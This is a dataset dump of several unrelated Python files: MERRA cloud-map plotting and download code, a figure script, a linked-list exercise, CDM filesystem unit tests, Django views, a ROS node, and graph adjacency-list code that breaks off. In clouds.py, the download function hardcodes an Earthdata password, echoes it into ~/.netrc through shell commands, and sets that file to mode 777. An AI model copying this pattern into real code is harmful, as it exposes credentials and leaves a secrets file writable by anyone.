ocean_color='dodgerblue', resolution='l', zorder=1)\n projection.drawcoastlines(linewidth=0.75, zorder=3)\n projection.drawcountries(linewidth=0.5, zorder=3)\n projection.drawmeridians(np.arange(-180, 181, 30), latmax=90, linewidth=0.5, zorder=3)\n projection.drawparallels(np.arange(-90, 91, 15), latmax=90, linewidth=0.5, zorder=3)\n else:\n raise ValueError('invalid map background specification')\n \n cf = self(time)\n \n lats = np.arange(-90., 90.25, 0.5)\n lons = np.arange(-180., 180.3125, 0.625)\n lons, lats = np.meshgrid(lons, lats)\n \n\n levs = np.linspace(0,1,256, endpoint=True)\n clevs = [col(x) for x in levs]\n \n \n x,y = projection(lons, lats)\n \n cfmask = np.ma.masked_greater(x, 1e15).mask\n cfmasked = np.ma.array(cf, mask=cfmask)\n \n plt.contourf(x, y, cfmasked, levs, colors=clevs, extend='both', zorder=2)\n \n if out == 'show':\n plt.show()\n elif out == '':\n pass\n else:\n plt.savefig(out)\n \n \ndef monthly_cloudiness(year, month, centre, cld_threshold=0.05, out='show', data_type='avg per day'):\n \"\"\"\n Method to show how cloudy different regions are\n over the course of a month. This is shown by an\n average number of cloud free hours per day. \n \n This code is largely a replica of Dan's code to\n do the same process, but this will likely run \n much faster. \n \n args:\n \n year - int. year which the data will be shown\n for.\n \n month - int. month which the data will be shown\n for\n \n centre - tuple of (lat,lon) indicating the centre\n of the orthographic projection onto which\n values will be plotted\n \n cld_threshold - maxmimum cloud fraction for a grid\n square to be considered cloud-free\n \n out - string to indicate what kind of output\n to provide\n \n data_type - what kind of data to provide. 'daylight fraction'\n will give the fraction of daylight hours that\n are cloud free, and 'avg per day' will give the\n average number of cloud free daylight hours per day\n \"\"\"\n \n def sun_rise_set(date, latitude):\n \"\"\"\n Determine the sunrise and sunset times,\n given a date and latitude\n \n https://en.wikipedia.org/wiki/Sunrise_equation\n \n args:\n \n date - dt.date instance of the day of the year\n \n latitude - array of latitudes to get the sun\n rise and sun set times\n \"\"\"\n j = int(date.strftime('%j'))\n \n \n solar_dec = 23.45*np.sin(2.*np.pi*((284.+j)/365.))\n A = -1.*np.tan(np.radians(latitude))*np.tan(np.radians(solar_dec))\n \n half_day_length = np.zeros(A.size, dtype=np.float64)\n \n interval = np.ma.masked_inside(A, -1., 1.).mask\n \n \n half_day_length[A < -1.] = 12.\n half_day_length[interval] = np.degrees(np.arccos(A[interval]))/15.\n \n rise = 12. - half_day_length\n set = 12. + half_day_length\n \n return (rise, set, A)\n \n \n filepath = \"/wrk8/MERRA/goldsmr5.gesdisc.eosdis.nasa.gov/%Y/%m/MERRA2_400.tavg3_3d_asm_Nv.%Y%m%d.nc4\"\n \n # construct a range of dates for the month\n d0 = dt.datetime(year, month, 1)\n d1 = dt.datetime(year+1, 1, 1) if month == 12 else dt.datetime(year, month+1, 1)\n date_range = time_utils.Time.arange(d0, d1, dt.timedelta(days=1))\n \n total_cloud_free = np.zeros((361, 577))\n total_daylight = np.zeros((361,577))\n \n for d in date_range:\n \n print(d)\n \n \n # load in the MERRA data for the day\n try: \n merra = Dataset(d.strftime(filepath), \"r\")\n \n except IOError:\n raise IOError('specified MERRA file %s does not exist' % d.strftime(filepath))\n \n \n clear_daylight = np.zeros((8,361,577))\n \n # get all the needed data\n lat = merra['lat'][...]\n lon = merra['lon'][...]\n cld = merra['CLOUD'][...]\n time = merra['time'][...]\n \n \n cld_first_column = cld[...,:1]\n cld = np.append(cld, cld_first_column, axis=-1)\n \n lon = np.append(lon, lon[-1] + 0.625)\n \n sunrise, sunset, _ = sun_rise_set(d, lat)\n \n cld_clear = np.sum(cld < cld_threshold, axis=1) == 72\n \n time_hours = (time + 90.) / 60.\n local_offset = (24./360.)*lon\n \n time_start = (time_hours[:,np.newaxis]*np.ones((1,lat.size)))[...,np.newaxis] + local_offset[np.newaxis,np.newaxis,:]\n time_finish = time_start + 3.\n \n time_start[time_start < 0.] += 24.\n time_start[time_start > 24.] -= 24.\n time_finish[time_finish < 0.] += 24.\n time_finish[time_finish > 24.] -= 24.\n \n \n sunrise = sunrise[np.newaxis,:,np.newaxis]*np.ones((time.size,1,lon.size))\n sunset = sunset[np.newaxis,:,np.newaxis]*np.ones((time.size,1,lon.size))\n \n before_sunrise = time_start <= sunrise\n after_sunrise = time_start > sunrise\n \n before_sunset = time_finish <= sunset\n after_sunset = time_finish > sunset\n \n within_interval = cld_clear*before_sunrise*after_sunset\n add_time = sunset[within_interval] - sunrise[within_interval]\n add_time[add_time < 0.] = 0.\n clear_daylight[within_interval] = add_time\n \n starts_in_interval = cld_clear*before_sunrise*before_sunset\n add_time = time_finish[starts_in_interval] - sunrise[starts_in_interval]\n add_time[add_time < 0.] = 0.\n clear_daylight[starts_in_interval] = add_time\n \n ends_in_interval = cld_clear*after_sunset*after_sunrise\n add_time = sunset[ends_in_interval] - time_start[ends_in_interval]\n add_time[add_time < 0.] = 0.\n clear_daylight[ends_in_interval] = add_time\n \n full_interval = cld_clear*after_sunrise*before_sunset\n add_time = time_finish[full_interval] - time_start[full_interval]\n add_time[add_time < 0.] = 0.\n clear_daylight[full_interval] = add_time \n \n clear_daylight_daily = np.sum(clear_daylight, axis=0)\n daylight_daily = sunset[0] - sunrise[0]\n \n total_cloud_free += clear_daylight_daily\n total_daylight += daylight_daily\n \n merra.close()\n \n \n lon_grid, lat_grid = np.meshgrid(lon, lat)\n \n projection = Basemap(projection='robin', lat_0=centre[0], lon_0=centre[1], resolution='l')\n \n projection.drawcoastlines()\n projection.drawcountries()\n\n \n x, y = projection(lon_grid, lat_grid)\n \n cmask = np.ma.masked_greater(x, 1e15).mask\n cmasked = np.ma.array(total_cloud_free, mask=cmask)\n \n if data_type == 'daylight fraction':\n \n daylight_filled = np.ma.masked_values(total_daylight, 0.).filled(1.) \n fraction = cmasked / daylight_filled\n \n vmin = 0.\n vmax = 1. \n \n sm = ScalarMappable(Normalize(vmin=vmin, vmax=vmax), cmap='nipy_spectral_r')\n levs = np.linspace(vmin, vmax, 256)\n clevs = [sm.to_rgba(lev) for lev in levs]\n \n elif data_type == 'avg per day':\n total_hours = len(date_range)\n fraction = cmasked / total_hours\n \n vmin = 0.\n vmax = 12. \n \n sm = ScalarMappable(Normalize(vmin=vmin, vmax=vmax), cmap='nipy_spectral_r')\n levs = np.linspace(vmin, vmax, 256)\n clevs = [sm.to_rgba(lev) for lev in levs]\n \n else:\n raise ValueError\n \n \n ctr = plt.contourf(x, y, fraction, levs, colors=clevs, extend='both')\n \n \n cbar = plt.colorbar(ctr, orientation='vertical', aspect=25, fraction=0.1, shrink = 0.625)\n cbar.set_ticks(np.linspace(vmin, vmax, 11))\n \n if data_type == 'daylight fraction':\n cbar.set_label(d0.strftime('Fraction of Cloud-Free Daylight for %B %Y'))\n elif data_type == 'avg per day':\n \n cbar.set_ticks(np.arange(0, 13, 2))\n \n if out == 'show':\n plt.show()\n elif out == '':\n pass\n else:\n plt.savefig(os.path.join('../figures/cloud_free_daylight_maps/', out), dpi=240)\n plt.close()\n \n\n \ndef animate(centre, start_time, end_time, map_bkgd='bluemarble'):\n \"\"\"\n Create an animation of cloud fields maps\n for each of the timesteps within a \n CloudCollection instance.\n \n args:\n \n centre - tuple of (lat,lon) indicating the centre\n of the orthographic projection.\n \n start_time - dt.datetime or time_utils.Time instance\n of the start time of the interval\n \n end_time - dt.datetime or time_utils.Time instance\n of the end time of the interval\n \n map_bkgd - string indicating what kind of background\n to use.\n \"\"\"\n \n if isinstance(start_time, dt.datetime):\n t1 = time_utils.Time(start_time, start_time)\n else:\n t1 = start_time\n \n if isinstance(end_time, dt.datetime):\n t2 = time_utils.Time(end_time, t1.ref)\n else:\n t2 = end_time.change_ref(t1.ref)\n \n # find the midpoint and length of the time interval\n delta = t2 - t1\n midpoint = t1 + 0.5*delta\n \n # initialize cloud fields\n cld = CloudCollection(midpoint, delta)\n \n # create a temporary directory to store the\n # images that will make up the video\n os.system('mkdir ../figures/animation_temp')\n \n # Draw cloud map for each time step in the CloudCollection,\n # saving each one as a separate image\n for k,t in enumerate(cld.times):\n try:\n print(t.datetime)\n cld.show_clouds_ortho(t, centre, out='', map_bkgd=map_bkgd)\n \n plt.title(t.strftime('%d %b %Y %H:%M:%S'))\n \n plt.savefig('../figures/animation_temp/cloud{:03}.png'.format(k))\n plt.close()\n except ValueError:\n pass\n \n # create the video, and then delete the individual images\n # and the temporary folder \n os.system('mencoder -o ../figures/clouds_{0}_{1}.avi mf://../figures/animation_temp/cloud*.png -ovc lavc -lavcopts vcodec=msmpeg4v2 -mf fps=2'.format(t1.strftime('%y%m%d'), t2.strftime('%y%m%d'))) \n os.system('rm ../figures/animation_temp/*.png')\n os.system('rmdir ../figures/animation_temp') \n \n \ndef download_merra_data(year, month):\n '''\n Notes:\n This function was created using these instructions from NASA:\n https://disc.gsfc.nasa.gov/data-access#mac_linux_wget\n Also note that MERRA data is only published for up to about 2 months ago\n (from whever you're reading this,\n e.g. I only have data up to July and it's mid-September).\n If you try to get data from the future none will download\n (nothing will crash though).\n Inputs:\n year (string): the year you want to download\n month (string): the month you want to download\n No outputs, just saves the MERRA data to wherever you tell it to go.\n '''\n print(\"Downloading MERRA Data for\", year, month)\n print(\"this will take approximately forever\")\n user = \"CallumMcCracken\" # input(\"Enter earthdata.nasa.gov username: \")\n password = \"ThisIsMyV3ryStrongPassword\" # input(\"Enter password: \")\n cwd = os.getcwd() # so we can get back here at the end\n os.chdir(os.path.expanduser(\"~\"))\n if not os.path.exists(\".netrc\"):\n os.system(\"touch .netrc\")\n os.system('echo \"machine urs.earthdata.nasa.gov '\n + 'login {} '.format(user)\n + 'password {}\" >> .netrc'.format(password))\n os.system('chmod 777 .netrc') # so future people can edit\n os.system('touch .urs_cookies')\n \n # (this will take a bit of an eternity to run)\n os.chdir(merra_dir)\n wget_format = \"https://goldsmr5.gesdisc.eosdis.nasa.gov/opendap/MERRA2/M2T3NVASM.5.12.4/{year}/{month:02}/MERRA2_400.tavg3_3d_asm_Nv.{year}{month:02}{day:02}.nc4.nc?CLOUD[0:7][0:71][0:360][0:575],lat[0:360],time[0:7],lon[0:575],lev\"\n for day in range(1, monthrange(year, month)[1]+1):\n print(\"working on day\", day)\n os.system(\"wget --load-cookies ~/.urs_cookies \"\n \"--save-cookies ~/.urs_cookies \"\n \"--keep-session-cookies \"\n \"--cut-dirs 3 \"\n \"-r -c -nH -nd -np \"\n \"-A MERRA2_400.tavg3_3d_asm_Nv.{year}{month:02}{day:02}* \".format(year=year, month=month, day=day) +\n \"--content-disposition \" +\n wget_format.format(year=year, month=month, day=day))\n print(\"done day\", day)\n\n for fname in os.listdir():\n # rename all .nc4.nc files as just .nc4, plus move them\n if fname.endswith(\"nc4.nc\"):\n new_filename = fname[:-3]\n new_dir = join(\"{}\".format(year), \"{:02}\".format(month))\n if not exists(new_dir):\n os.mkdir(new_dir)\n os.system(\"mv \"+fname+\" \"+join(new_dir, new_filename))\n # remove wget logs\n if \"wget-log\" in fname:\n os.remove(fname)\n\n # at the end return us to the cwd\n os.chdir(cwd)\n\n \nif __name__ == '__main__':\n dtime = dt.datetime(2015,10,23)\n time = time_utils.Time(dtime,dtime)\n clouds = Clouds(time).show_clouds_ortho(time, (0,0), map_bkgd='mask') \n","sub_path":"modules/earth_data/clouds.py","file_name":"clouds.py","file_ext":"py","file_size_in_byte":27211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"316367499","text":"\nimport os\nfrom math import pi\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport bayesik as bik\n\n\n\n\nnlinks = 2\nfnameNPZ = os.path.join( bik.dirREPO, 'Data', f'links{nlinks}.npz')\nscale = [1000, 1000] + [180/pi]*nlinks\nwith np.load(fnameNPZ) as Z:\n\tQ = scale * Z['Q']\n\tQB = scale * Z['QB']\n\tQLS = scale * Z['QLS']\nEB0,ELS0 = QB - Q, QLS - Q\n\n\n\n\nplt.close('all')\nfig,AX = plt.subplots( 2, 2, figsize=(6,4) )\nfontname = u'Times New Roman'\n\nc0,a0,ec0 = 'k', 1, '0.7'\ncB,aB,ecB = 'b', 0.7, '0'\n\n### posture model errors:\nrangesLS = [(-4,4), (-4,4), (-2,2), (-2,2)]\nrangesB = rangesLS\nfor i,ax in enumerate(AX.ravel()):\n\tax.hist(ELS0[:,i], bins=21, range=rangesLS[i], color=c0, ec=ec0, alpha=a0, zorder=-1, label='Least-squares')\n\tax.hist(EB0[:,i], bins=21, range=rangesB[i], color=cB, ec=ecB, alpha=aB, label='Bayesian')\n\tif i==0:\n\t\tleg = ax.legend(loc='upper right', bbox_to_anchor=(1.1,1))\n\t\tplt.setp(leg.get_texts(), size=8, name=fontname)\n\n\n### label axes:\n[ax.set_ylabel('Frequency', name=fontname, size=14) for ax in AX[:,0]]\nlabels = [r'$r_x$ $\\textrm{error (mm)}$', r'$r_y$ $\\textrm{error (mm)}$', r'$\\phi_1$ $\\textrm{error (mm)}$', r'$\\phi_2$ $\\textrm{error (mm)}$']\n[ax.set_xlabel(s, size=14, usetex=True, name=fontname) for ax,s in zip(AX.ravel(),labels)]\n[plt.setp(ax.get_xticklabels() + ax.get_yticklabels(), name=fontname, size=9) for ax in AX.ravel()]\n\n\nplt.tight_layout()\nplt.show()\n\n\n# plt.savefig( os.path.join( bik.dirREPO, 'Appendix', 'ipynb', 'figs', f'error-{nlinks}-link.png') )\n\n\n\n","sub_path":"Python/figE1.py","file_name":"figE1.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"549940846","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def _connect(self, c, L, carry):\n while L is not None:\n val = ( L.val + carry ) % 10\n carry = ( L.val + carry ) // 10\n L.val = val\n c.next = L\n c = c.next\n L = L.next\n if carry == 1:\n c.next = ListNode(1)\n\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n carry = 0\n head = ListNode(0)\n curr = head\n while l1 is not None or l2 is not None:\n if l1 is None:\n self._connect (curr, l2, carry)\n return head.next\n if l2 is None:\n self._connect (curr, l1, carry)\n return head.next\n\n val = (l1.val + l2.val + carry) % 10\n carry = (l1.val + l2.val + carry) // 10\n tmp = ListNode(val)\n curr.next = tmp\n curr = curr.next\n l1 = l1.next\n l2 = l2.next\n if carry == 1:\n curr.next = ListNode(1)\n return head.next\n\n\n\n\n\nsol = Solution()\ndef createList(L):\n head = ListNode(0)\n curr = head\n for i in L:\n tmp = ListNode(i)\n curr.next = tmp\n curr = curr.next\n # printList (head.next)\n return head.next\ndef printList(L):\n while L is not None:\n print (L.val, end=' ')\n L = L.next\n print(\"\\n\")\nprint(\"L1\")\nL1 = createList([9,9])\nprint(\"L2\")\nL2 = createList([1])\nresult = sol.addTwoNumbers(L1, L2)\nprintList(result)\n","sub_path":"2018_google/002_sol.py","file_name":"002_sol.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"650025799","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.2 (3180)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/__unit_test__/ally/cdm/impl/local_filesystem.py\n# Compiled at: 2013-10-02 09:54:40\n\"\"\"\nCreated on Jan 9, 2012\n\n@package support - cdm\n@copyright 2012 Sourcefabric o.p.s.\n@license http: // www.gnu.org / licenses / gpl - 3.0.txt\n@author: Mugur Rus\n\nProvides unit testing for the local filesystem module.\n\"\"\"\nimport package_extender\npackage_extender.PACKAGE_EXTENDER.setForUnitTest(True)\nfrom ally.cdm.impl.local_filesystem import HTTPDelivery, LocalFileSystemCDM, LocalFileSystemLinkCDM\nfrom ally.cdm.spec import PathNotFound\nfrom ally.zip.util_zip import normOSPath\nfrom datetime import datetime\nfrom io import BytesIO\nfrom os import makedirs, remove, sep, stat\nfrom os.path import join, dirname, isfile, isdir\nfrom shutil import rmtree\nfrom tempfile import NamedTemporaryFile, TemporaryDirectory\nimport json, re, unittest\nnormpath = lambda txt: re.sub('[\\\\W]+', '', txt)\n\nclass TestHTTPDelivery(unittest.TestCase):\n\n def testHTTPDelivery(self):\n d = HTTPDelivery()\n d.serverURI = 'http://localhost:8080/content/'\n self.assertEqual(d.getURI('somedir/somefile.jpg'), 'http://localhost:8080/content/somedir/somefile.jpg', 'Computing the URI')\n\n def testLocalFilesystemCDM(self):\n d = HTTPDelivery()\n rootDir = TemporaryDirectory()\n d.serverURI = 'http://localhost/content/'\n d.repositoryPath = rootDir.name\n cdm = LocalFileSystemCDM()\n cdm.delivery = d\n try:\n srcTmpFile = NamedTemporaryFile(delete=False)\n srcTmpFile.close()\n dstPath = 'testdir1/tempfile.txt'\n cdm.publishFromFile(dstPath, srcTmpFile.name)\n dstFilePath = join(d.getRepositoryPath(), normOSPath(dstPath))\n self.assertTrue(isfile(dstFilePath))\n self.assertEqual(datetime.fromtimestamp(stat(dstFilePath).st_mtime), cdm.getTimestamp(dstPath))\n finally:\n rmtree(dirname(dstFilePath))\n remove(srcTmpFile.name)\n\n try:\n inFileName = join('dir1', 'subdir2', 'file1.txt')\n dstPath = join('testdir2', 'tempfile2.txt')\n cdm.publishFromFile(dstPath, join(dirname(__file__), 'test.zip', inFileName))\n dstFilePath = join(d.getRepositoryPath(), normOSPath(dstPath))\n self.assertTrue(isfile(dstFilePath))\n finally:\n rmtree(dirname(dstFilePath))\n\n srcTmpDir = TemporaryDirectory()\n dirs = ('test1/subdir1', 'test2/subdir1')\n for dir in dirs:\n fullPath = join(srcTmpDir.name, dir)\n makedirs(fullPath)\n with open(join(fullPath, 'text.html'), 'w') as (_f):\n pass\n\n try:\n cdm.publishFromDir('testdir3', srcTmpDir.name)\n dstDirPath = join(d.getRepositoryPath(), 'testdir3')\n for dir in dirs:\n dstFilePath = join(dstDirPath, dir, 'text.html')\n self.assertTrue(isfile(dstFilePath))\n self.assertEqual(datetime.fromtimestamp(stat(dstFilePath).st_mtime), cdm.getTimestamp(join('testdir3', dir, 'text.html')))\n\n filePath = 'testdir3/test1/subdir1/text.html'\n self.assertTrue(isfile(join(d.getRepositoryPath(), filePath)))\n cdm.republish(filePath, filePath + '.new')\n self.assertTrue(isfile(join(d.getRepositoryPath(), filePath + '.new')))\n cdm.republish(filePath + '.new', filePath)\n cdm.remove(filePath)\n self.assertFalse(isfile(join(d.getRepositoryPath(), filePath)))\n dirPath = 'testdir3/test2'\n self.assertTrue(isdir(join(d.getRepositoryPath(), dirPath)))\n cdm.remove(dirPath)\n self.assertFalse(isdir(join(d.getRepositoryPath(), dirPath)))\n finally:\n rmtree(dstDirPath)\n\n try:\n cdm.publishFromDir('testdir4', join(dirname(__file__), 'test.zip', 'dir1'))\n dstDirPath = join(d.getRepositoryPath(), 'testdir4')\n dstFilePath = join(dstDirPath, 'subdir1', 'file1.txt')\n self.assertTrue(isfile(dstFilePath))\n dstFilePath = join(dstDirPath, 'subdir2', 'file2.txt')\n self.assertTrue(isfile(dstFilePath))\n dstFilePath = join(dstDirPath, 'sometestfile.txt')\n with open(dstFilePath, 'w') as (_f):\n pass\n cdm.publishFromDir('testdir4', join(dirname(__file__), 'test.zip', 'dir1'))\n self.assertTrue(isfile(dstFilePath))\n finally:\n rmtree(dstDirPath)\n\n try:\n path = join('testdir5', 'somecontent.txt')\n cdm.publishContent(path, BytesIO(b'test'))\n dstFilePath = join(d.getRepositoryPath(), path)\n self.assertTrue(isfile(dstFilePath))\n finally:\n rmtree(join(d.getRepositoryPath(), dirname(path)))\n\n try:\n path = join('testdir6', 'somecontent2.txt')\n cdm.publishFromFile(path, BytesIO(b'test 2'))\n dstFilePath = join(d.getRepositoryPath(), path)\n self.assertTrue(isfile(dstFilePath))\n finally:\n rmtree(join(d.getRepositoryPath(), dirname(path)))\n\n def testLocalFileSystemLinkCDM(self):\n d = HTTPDelivery()\n rootDir = TemporaryDirectory()\n d.serverURI = 'http://localhost/content/'\n d.repositoryPath = rootDir.name\n cdm = LocalFileSystemLinkCDM()\n cdm.delivery = d\n try:\n exceptionRaised = False\n cdm.publishFromFile('a/../../b', 'somefile.txt')\n except PathNotFound:\n exceptionRaised = True\n\n self.assertTrue(exceptionRaised, 'No exception was raised on out of repository path')\n try:\n srcTmpFile = NamedTemporaryFile()\n dstFile = join('testdir7', 'tempfile.txt')\n cdm.publishFromFile(dstFile, srcTmpFile.name)\n dstLinkPath = join(d.getRepositoryPath(), dstFile + cdm._linkExt)\n self.assertTrue(isfile(dstLinkPath))\n with open(dstLinkPath) as (f):\n links = json.load(f)\n self.assertIsInstance(links, list)\n self.assertEqual(links[0][0], 'FS')\n self.assertEqual(srcTmpFile.name, links[0][1])\n self.assertEqual(datetime.fromtimestamp(stat(srcTmpFile.name).st_mtime), cdm.getTimestamp('testdir7/tempfile.txt'))\n finally:\n rmtree(dirname(dstLinkPath))\n\n try:\n dstFile = join('testdir8', 'tempfile2.txt')\n inFileName = join('dir1', 'subdir2', 'file1.txt')\n srcFilePath = join(dirname(__file__), 'test.zip', inFileName)\n cdm.publishFromFile(dstFile, srcFilePath)\n dstLinkPath = join(d.getRepositoryPath(), dstFile + cdm._linkExt)\n self.assertTrue(isfile(dstLinkPath))\n with open(dstLinkPath) as (f):\n links = json.load(f)\n self.assertEqual(links[0][0], 'ZIP')\n zipPath = links[0][1]\n inPath = normOSPath(links[0][2], True)\n linkPath = join(zipPath, inPath)\n self.assertEqual(normpath(linkPath), normpath(srcFilePath))\n self.assertEqual(datetime.fromtimestamp(stat(join(dirname(__file__), 'test.zip')).st_mtime), cdm.getTimestamp('testdir8/tempfile2.txt'))\n finally:\n rmtree(dirname(dstLinkPath))\n\n srcTmpDir = TemporaryDirectory()\n dirs = (join(srcTmpDir.name, 'test1/subdir1'), join(srcTmpDir.name, 'test2/subdir1'))\n for dir in dirs:\n makedirs(dir)\n with open(join(dir, 'text.html'), 'w+') as (_f):\n pass\n\n try:\n cdm.publishFromDir('testlink1', srcTmpDir.name)\n dstLinkPath = join(d.getRepositoryPath(), 'testlink1' + cdm._linkExt)\n self.assertTrue(isfile(dstLinkPath))\n with open(dstLinkPath) as (f):\n links = json.load(f)\n self.assertEqual(links[0][0], 'FS')\n self.assertEqual(srcTmpDir.name, links[0][1])\n self.assertEqual(datetime.fromtimestamp(stat(join(srcTmpDir.name, 'test1/subdir1/text.html')).st_mtime), cdm.getTimestamp('testlink1/test1/subdir1/text.html'))\n delPath1 = 'testlink1/test1/subdir1/text.html'\n cdm.remove(delPath1)\n self.assertTrue(isfile(join(d.getRepositoryPath(), delPath1 + '.deleted')))\n delPath2 = 'testlink1/test1'\n cdm.remove(delPath2)\n self.assertTrue(isfile(join(d.getRepositoryPath(), delPath2 + '.deleted')))\n finally:\n rmtree(join(d.getRepositoryPath(), 'testlink1'))\n remove(dstLinkPath)\n\n try:\n srcFilePath = join(dirname(__file__), 'test.zip', 'dir1') + sep\n cdm.publishFromFile('testlink2', srcFilePath)\n dstLinkPath = join(d.getRepositoryPath(), 'testlink2' + cdm._linkExt)\n self.assertTrue(isfile(dstLinkPath))\n with open(dstLinkPath) as (f):\n links = json.load(f)\n self.assertEqual(links[0][0], 'ZIP')\n zipPath = links[0][1]\n inPath = normOSPath(links[0][2], True)\n link = join(zipPath, inPath)\n self.assertEqual(link, srcFilePath)\n self.assertEqual(datetime.fromtimestamp(stat(join(dirname(__file__), 'test.zip')).st_mtime), cdm.getTimestamp('testlink2/subdir1/file1.txt'))\n delPath1 = 'testlink2/subdir1/file1.txt'\n cdm.remove(delPath1)\n self.assertTrue(isfile(join(d.getRepositoryPath(), delPath1 + '.deleted')))\n delPath2 = 'testlink2/subdir1/'\n self.assertTrue(isdir(join(d.getRepositoryPath(), delPath2)))\n cdm.remove(delPath2)\n self.assertTrue(isfile(join(d.getRepositoryPath(), delPath2.rstrip('/') + '.deleted')))\n self.assertFalse(isdir(join(d.getRepositoryPath(), delPath2)))\n self.assertFalse(isfile(join(d.getRepositoryPath(), delPath1 + '.deleted')))\n finally:\n rmtree(join(d.getRepositoryPath(), 'testlink2'))\n remove(dstLinkPath)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pycfiles/ally_py-0.9.0-py3.2/local_filesystem.cpython-32.py","file_name":"local_filesystem.cpython-32.py","file_ext":"py","file_size_in_byte":10318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"601947139","text":"__author__ = 'jason.parent@carneylabs.com (Jason Parent)'\n\n# Django imports...\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\n\n# Local imports...\nfrom .forms import ProfileForm\n\n\n@login_required\ndef profile_view(request):\n return render(request, 'accounts/profile.html')\n\n\n@login_required\ndef profile_edit_view(request):\n form = ProfileForm(instance=request.user)\n\n if request.method == 'POST':\n form = ProfileForm(instance=request.user, data=request.POST, files=request.FILES)\n\n if form.is_valid():\n form.save()\n\n return redirect(reverse('profile'))\n\n return render(request, 'accounts/profile_edit.html', {\n 'form': form\n })","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"489507881","text":"#!/usr/bin/env python\n\n\nimport rospy\nfrom tf_sim.msg import Float32Stamped\n\ndef step_gen():\n\n pub = rospy.Publisher('input_val', Float32Stamped, queue_size=10)\n\n rospy.init_node('step_sim')\n\n mg = rospy.get_param('~magnitude', 60)\n freq = rospy.get_param('~frequency', 10)\n\n\n rospy.loginfo('Simulating step of magnitude %d', mg)\n\n rate = rospy.Rate(freq)\n\n msg = Float32Stamped()\n\n while not rospy.is_shutdown():\n\n msg.data = mg\n msg.header.stamp = rospy.get_rostime()\n\n pub.publish(msg)\n\n rate.sleep()\n\nif __name__ == '__main__':\n\n global mg\n\n try:\n step_gen()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"Izar Castorina - Entrega 2 PCSE/Parte 2/tf_sim/scripts/step_sim_node.py","file_name":"step_sim_node.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"503722136","text":"\"\"\"\nVNode顶点\nArcNode 弧\n邻接表\n\"\"\"\n\n\nclass ArcNode:\n def __init__(self, info, vnode=None, nextArcNode=None):\n self.vnode = vnode\n self.nextArcNode = nextArcNode\n self.info = info\n\n\nclass Vnode:\n def __init__(self, data: str, firstArc: ArcNode = None):\n self.data = data\n self.firstArc = firstArc\n\n\nclass AdjvexStruct:\n def __init__(self, vnodeLs: list, kind: int, vnum: int = None, arcnum: int = None):\n self.vnodeLs = vnodeLs\n self.vnum = vnum\n self.arcnum = arcnum\n self.kind = kind\n\n\n# 构建有向图邻接表\n# 逻辑结构如 directed_1.jpg 所示\ndef buildAdj():\n v1 = Vnode('v1')\n v2 = Vnode('v2')\n v3 = Vnode('v3')\n v4 = Vnode('v4')\n\n arc1 = ArcNode(\"arc1\")\n arc2 = ArcNode(\"arc2\")\n arc3 = ArcNode(\"arc3\")\n arc4 = ArcNode(\"arc4\")\n arc5 = ArcNode(\"arc5\")\n arc6 = ArcNode(\"arc6\")\n\n v1.firstArc = arc1\n arc1.vnode = v2\n arc1.nextArcNode = arc2\n arc2.vnode = v3\n\n v2.firstArc = arc3\n arc3.vnode = v3\n arc3.nextArcNode = arc4\n arc4.vnode = v4\n\n v3.firstArc = arc5\n arc5.vnode = v4\n\n v4.firstArc = arc6\n arc6.vnode = v3\n\n vnodeLs = [v1, v2, v3, v4]\n directGraph = AdjvexStruct(vnodeLs, 1)\n\n for vnode in vnodeLs:\n print(vnode.data + \" - > \", end='')\n arc = vnode.firstArc\n while arc is not None:\n print(arc.info + \" - > \", end='')\n arc = arc.nextArcNode\n print()\n\n\n# 构建有向图「逆邻接表」\n# 逻辑结构如 directed_1.jpg 所示\ndef buildUnAdj():\n v1 = Vnode('v1')\n v2 = Vnode('v2')\n v3 = Vnode('v3')\n v4 = Vnode('v4')\n\n arc1 = ArcNode(\"arc1\")\n arc2 = ArcNode(\"arc2\")\n arc3 = ArcNode(\"arc3\")\n arc4 = ArcNode(\"arc4\")\n arc5 = ArcNode(\"arc5\")\n arc6 = ArcNode(\"arc6\")\n\n v2.firstArc = arc1\n arc1.vnode = v1\n\n v3.firstArc = arc2\n arc2.vnode = v1\n arc2.nextArcNode = arc3\n arc3.vnode = v2\n arc3.nextArcNode = arc6\n arc6.vnode = v4\n\n v4.firstArc = arc4\n arc4.vnode = v2\n arc4.nextArcNode = arc5\n arc5.vnode = v3\n\n vnodeLs = [v1, v2, v3, v4]\n directGraph = AdjvexStruct(vnodeLs, 1)\n\n for vnode in vnodeLs:\n print(vnode.data + \" - > \", end='')\n arc = vnode.firstArc\n while arc is not None:\n print(arc.info + \" - > \", end='')\n arc = arc.nextArcNode\n print()\n\n\n# 构建无向图邻接表\n# 逻辑结构如 undirected_1.jpg 所示\ndef buildUndirect():\n v1 = Vnode('v1')\n v2 = Vnode('v2')\n v3 = Vnode('v3')\n v4 = Vnode('v4')\n v5 = Vnode('v5')\n\n arc12 = ArcNode(\"arc1: v1 -> v2\")\n arc21 = ArcNode(\"arc1: v2 -> v1\")\n arc13 = ArcNode(\"arc2: v1 -> v3\")\n arc31 = ArcNode(\"arc2: v3 -> v1\")\n arc15 = ArcNode(\"arc3: v1 